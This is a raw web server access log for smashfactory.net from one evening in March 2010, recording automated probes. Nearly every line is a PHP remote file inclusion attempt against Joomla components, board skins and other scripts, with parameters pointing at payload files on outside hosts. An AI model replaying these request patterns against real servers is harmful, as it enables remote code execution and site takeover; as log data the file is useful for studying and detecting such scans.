195.95.229.230 - - [09/Mar/2010:20:37:58 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
69.163.150.203 - - [09/Mar/2010:20:38:11 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:39:01 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:39:01 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:39:08 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:31 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:31 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:31 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:36 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:36 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:20:44:36 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:47:37 -0800] "GET /logs/access_100205.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:52:45 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
219.94.193.152 - - [09/Mar/2010:20:52:47 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
219.94.193.152 - - [09/Mar/2010:20:52:47 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
219.94.193.152 - - [09/Mar/2010:20:52:47 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:52:49 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:52:49 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:20:55:08 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:20:55:08 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1374 "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:20:55:09 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:57:57 -0800] "GET /appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:57:57 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:57:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:58:08 -0800] "GET /logs/access_100205.log%20%20//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:58:46 -0800] "GET /board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:58:46 -0800] "GET /logs/access_100205.log%20%20//board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:20:58:46 -0800] "GET /logs//board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:20:59:29 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:20:59:29 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:20:59:29 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1374 "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:21:00:33 -0800] "GET /logs/access.log%20%20//board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:01:31 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:01:31 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:01:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1374 "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:02:00 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1374 "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:21:02:32 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1367 "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:03:10 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:03:32 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:04:58 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:04:58 -0800] "GET /logs/access.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:04:58 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:05:03 -0800] "GET /logs/access.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:05:03 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:05:03 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:06:16 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:21:06:55 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:21:06:55 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:21:06:55 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1367 "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:21:07:38 -0800] "GET /logs/access_100205.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:11:59 -0800] "GET //write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:12:03 -0800] "GET /logs///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:12:05 -0800] "GET /logs/access.log%20%20///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:12:10 -0800] "GET //write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:12:10 -0800] "GET /logs///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:12:13 -0800] "GET /logs/access.log%20%20///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:12:33 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:12:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:12:33 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:13:06 -0800] "GET /logs/access.log%20%20///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:13:09 -0800] "GET /logs///write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:13:10 -0800] "GET //write.php?dir=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:21:13:27 -0800] "GET /logs/access_100205.log//board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:14:19 -0800] "GET /write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:14:19 -0800] "GET /logs//write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:21:14:19 -0800] "GET /logs/access.log%20%20//write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:21:14:24 -0800] "GET /logs/access.log//board/bbs/////write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:14:39 -0800] "GET /write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:14:40 -0800] "GET /logs//write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:14:40 -0800] "GET /logs/access.log%20%20//write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:15:11 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lavoultesportif.com/include/yes.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:15:11 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lavoultesportif.com/include/yes.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.smashfactory.net"
209.197.232.13 - - [09/Mar/2010:21:15:12 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lavoultesportif.com/include/yes.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:34 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:37 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:37 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:37 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:51 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:19:52 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:21:21:22 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:21:21:31 -0800] "GET /logs/access_100205.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:21:23:03 -0800] "GET /logs/access.log//write.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:28:31 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:29:00 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:29:00 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:29:00 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:21:29:25 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:29:44 -0800] "GET /logs/access_100205.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:30:11 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:30:11 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:30:11 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:21:30:43 -0800] "GET /logs/access_100205.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:34 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:37 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:43 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:43 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.51 - - [09/Mar/2010:21:34:44 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:37:16 -0800] "GET //write.php?dir=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:37:26 -0800] "GET /logs///write.php?dir=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:21:37:27 -0800] "GET /logs/access.log%20%20///write.php?dir=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:37:43 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:37:43 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.168.12.31 - - [09/Mar/2010:21:37:43 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lumixclub.com/bbs/sex/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "smashfactory.net"
193.0.247.4 - - [09/Mar/2010:21:51:26 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
193.0.247.4 - - [09/Mar/2010:21:51:26 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
193.0.247.4 - - [09/Mar/2010:21:51:26 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:08:52 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:08:52 -0800] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:08:52 -0800] "GET /logs/access.log%20%20//snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:09:11 -0800] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:09:11 -0800] "GET /logs/access.log%20%20//snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:09:15 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:22:15:27 -0800] "GET /logs/access.log%20%20//snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:16:22 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:16:22 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:16:28 -0800] "GET /logs/access.log%20%20//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
